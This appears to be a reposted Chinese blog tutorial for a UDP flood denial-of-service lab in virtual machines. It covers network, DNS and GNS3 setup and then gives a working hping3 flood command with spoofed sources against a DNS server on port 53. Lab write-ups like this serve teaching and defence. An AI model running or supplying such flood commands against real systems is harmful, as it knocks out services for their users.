UDP Flood攻击实验

这篇具有很好参考价值的文章主要介绍了UDP Flood攻击实验。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

本实验方法一定不要用来攻击公网的服务器,仅能在自己的虚拟机里进行操作!不然可能构成违法行为,大家一定注意!!!!!

实验准备:

Kali虚拟机;

win10虚拟机;

Win 2016 servers虚拟机;

GNS3。 

一、实验环境搭建

UDP Flood攻击实验

  1、虚拟网络编辑器配置

UDP Flood攻击实验

 之后再点击更改设置

UDP Flood攻击实验

之后添加网络,VMnet1和VMnet2。记得一定要将使用本地DHCP服务将IP地址分配给虚拟机这一选项去掉。因为我们之后为了实验,是要手动给他配置IP的,你如果用了本地DHCP服务器,它会自己给你分配IP,这个原理我们之后在DHCP里会讲明白。

UDP Flood攻击实验

2、编辑虚拟机设置

UDP Flood攻击实验

Kali和win10的要将网络适配器改成VMnet1,Window2016的改成VMnet2。

 3、给三个主机配置IP地址

打开Kali的终端(root模式,本篇文章都是root,因为root是Kali里的最高权限),输入 vim /etc/network/interfaces。

UDP Flood攻击实验

然后按字母 i ,这样可以更改其中的内容 ,添加IP地址。

auto eth0

iface eth0 inet static

address IP地址

netmask 子网掩码

gateway 网关IP地址

 UDP Flood攻击实验

然后按下ESC,再按  :  然后输入wq ,回车保存即可。

然后再输入 systemctl restart networking重启网卡。(这一步很重要) 

最后输入ifconfig看IP是否配置成功

 UDP Flood攻击实验

 我们这里配置成功了,之后我们再去配置Windows2016的。

netsh interface ip set address “Ethernet0”static IP地址 子网掩码 网关IP地址

UDP Flood攻击实验

输入ipconfig查看是否配置成功。

UDP Flood攻击实验

最后我们配置一下win10的IP地址(注意这个首选DNS,先填上,后面说)

UDP Flood攻击实验

ipconfig查看,配置成功。 

UDP Flood攻击实验

 4、GNS3搭建实验环境

搭建拓扑网络。

UDP Flood攻击实验

这一部分如果有不会搭的,可以看我之前的文章:(1条消息) GNS3安装及实验中应用_打提莫的都是坏人的博客-CSDN博客

中有讲。这里着重说一下交换机和路由器的配置。

这里交换机我们是将路由器改变形状为ethernet_switch这个。

UDP Flood攻击实验

然后交换机的配置代码如下图,conf t进入配置模式后输入no ip routing即可。

UDP Flood攻击实验

路由器的配置代码为:

UDP Flood攻击实验

搭建好后,三个主机互ping一下,都能ping通说明没问题,可以继续做啦(记得关防火墙哦)。

5、在win2016的DNS服务器中建立域名与本机IP的映射关系

在服务器管理器中点击工具,打开DNS服务器。

UDP Flood攻击实验

右键正向查找区域,新建区域。

UDP Flood攻击实验

之后一顿下一步,然后在区域名称这里输入cybersecurity.com

UDP Flood攻击实验

然后一直下一步即可。

之后我们来建立映射关系。双击正向查找区域,右键cybersecuity.com,点击新建主机。

UDP Flood攻击实验

名称处填www,IP地址是本机IP,即192.168.2.1

UDP Flood攻击实验

这也就是为什么我们在Win10中DNS服务器填写的是win2016的IP地址。

6、验证是否可以解析域名

我们在win10中输入域名看是否能打开网页

UDP Flood攻击实验

很明显,成功打开,再用nslookup看是否能解析域名。

UDP Flood攻击实验

解析域名成功,接下来我们看发起UDP攻击后,还能否解析。

二、发起UDP攻击

1、在Kali中输入指令发起攻击

Hping3 --udp --rand-source -p 53 -d 100 --flood 目标服务器的IP地址

在这里的话,即输入hping3 --udp --rand-source -p 53 -d 100 --flood 192.168.2.1

UDP Flood攻击实验

wireshark抓取1网段和2网段的报文分析。 

UDP Flood攻击实验

UDP Flood攻击实验

 2、查看攻击后域名能否解析

此时发现在win10中已无法解析域名,UDP Flood攻击成功。

UDP Flood攻击实验

 该实验结束。

大家一定不要作死去攻击公网,作者在开篇已强调只能在虚拟机中进行,如果读者去进行不法行为,引起的后果自行承担,与作者无关。文章来源地址https://www.toymoban.com/news/detail-400835.html

到了这里,关于UDP Flood攻击实验的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • What is a UDP Flood Attack?

    用户数据报协议 (UDP) 是计算机网络中使用的无连接、不可靠的协议。它在互联网协议 (IP) 的传输层上运行,并提供跨网络的快速、高效的数据传输。与TCP(其更可靠的对应物)不同,UDP不提供端到端的可靠性或流量控制。 UDP 洪水攻击是一种分布式拒绝服务 (DDoS) 攻

    2024年02月07日
    浏览(26)
  • DDOS渗透与攻防(二)之SYN-Flood攻击

    系列文章 DDOS渗透与攻防(一)之拒绝服务攻击概念介绍 (1).攻击协议原理介绍说明_Syn-Flood SYN Flood (SYN洪水) 是种典型的DoS (Denial of Service,拒绝服务) 攻击。效果就是服务器TCP连接资源耗尽,停止响应正常的TCP连接请求。 说到原理,还得从TCP如何建立连接(Connection)讲起。通信的双

    2024年02月02日
    浏览(43)
  • Quicker+Axmath用来在Word中输入公式,简直不要太香

    目录 概述 Axmath安装及使用 Quicker的安装与使用 利用Quicker为Word中插入公式设置快捷动作         我们平常输入公式常用的可能为word自带的公式编辑器,或者 mathtype (此软件需付费,一年需要300多),我第一次输入公式时是根据别人的推荐使用的Mathtype,前前后后大概花了

    2024年02月05日
    浏览(34)
  • UDP攻击实战及其简略防御方法

    在正常情况下,server端在特定端口上收到UDP数据包时将通过下面两个步骤进行响应: 1、服务器先检查是否有任何当前监听指定端口请求的程序正在运行 2、如果该端口上没有程序正在接受数据包,则服务器将以ICMP(ping)数据包作为响应,以告知发送方目标不可达 Hacker可以通

    2024年02月04日
    浏览(28)
  • UDP就一定比TCP快吗?

    话说,UDP比TCP快吗? 相信就算不是八股文老手,也会下意识的脱口而出:”是“。 但这也让人好奇, 用UDP就一定比用TCP快吗?什么情况下用UDP会比用TCP慢? 我们今天就来聊下这个话题。 作为一个程序员,假设我们需要在A电脑的进程发一段数据到B电脑的进程,我们一般会在

    2024年02月06日
    浏览(18)
  • python 面向对象编程的特点 - 封装 - 继承(经典类、新式类) - 多态 - 静态方法、类方法 - 下划线的使用 - 回合制攻击游戏实验

    目录 面向对象编程的特点: 封装:封装是将数据和操作(方法)封装在一个对象中的能力 继承:继承是指一个类(子类)可以继承另一个类(父类)的属性和方法。 我们为什么需要继承呢? 父类/基类 = ATM 子类/派生类= ChinaATM/ICBCATM ATM系统父类子类讲解代码: 经典类和新式

    2024年02月15日
    浏览(35)
  • UDP攻击是什么?

    UDP是一个简单的面向数据报的运输层协议 ,也是最常见的作为流量攻击最多的一种协议,需要用到UDP的主要都是视频通讯,枪战类实时通讯的游戏类。UDP不提供可靠性,它只是把应用程序传给IP层的数据报发送出去,但并不保证它们能到达目的地。由于UDP传输数据前传输数据

    2024年02月09日
    浏览(21)
  • 漏洞攻击中怎么去做最全面覆盖的sql注入漏洞攻击?表信息是如何泄露的?预编译就一定安全?最受欢迎的十款SQL注入工具配置及使用

    漏洞攻击中怎么去做最全面覆盖的sql注入漏洞攻击?表信息是如何泄露的?预编译就一定安全?最受欢迎的十款SQL注入工具配置及使用。 SQL注入是因为后台SQL语句拼接了用户的输入,而且Web应用程序对用户输入数据的合法性没有判断和过滤,前端传入后端的参数是攻击者可控

    2024年01月24日
    浏览(36)
  • 结合实验详解USG6000V防火墙的相关配置(小白一定要看!!!)

    这两天跟着老师学习了网络安全防御之防火墙的配置,过程中不乏遇到了许多问题,例如 访问https://ip:8443地址却没有提示继续进入的接口,或者是无法ping通防火墙测试端口 等问题,希望接下来的分享能够帮助到大家! 为了节省大家的时间,我把实验和具体问题分开罗列,大

    2024年02月01日
    浏览(36)
  • React 用来解析html 标签的方法

    在React中,解析HTML标签通常是使用JSX(JavaScript XML)语法的一部分。JSX允许您在JavaScript代码中编写类似HTML的标记,然后通过React进行解析和渲染。 以下是React中解析HTML标签的几种常见方式: 直接在JSX中使用标签:您可以在JSX中像使用HTML标签一样使用标签,React会将其解析为

    2024年02月14日
    浏览(26)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包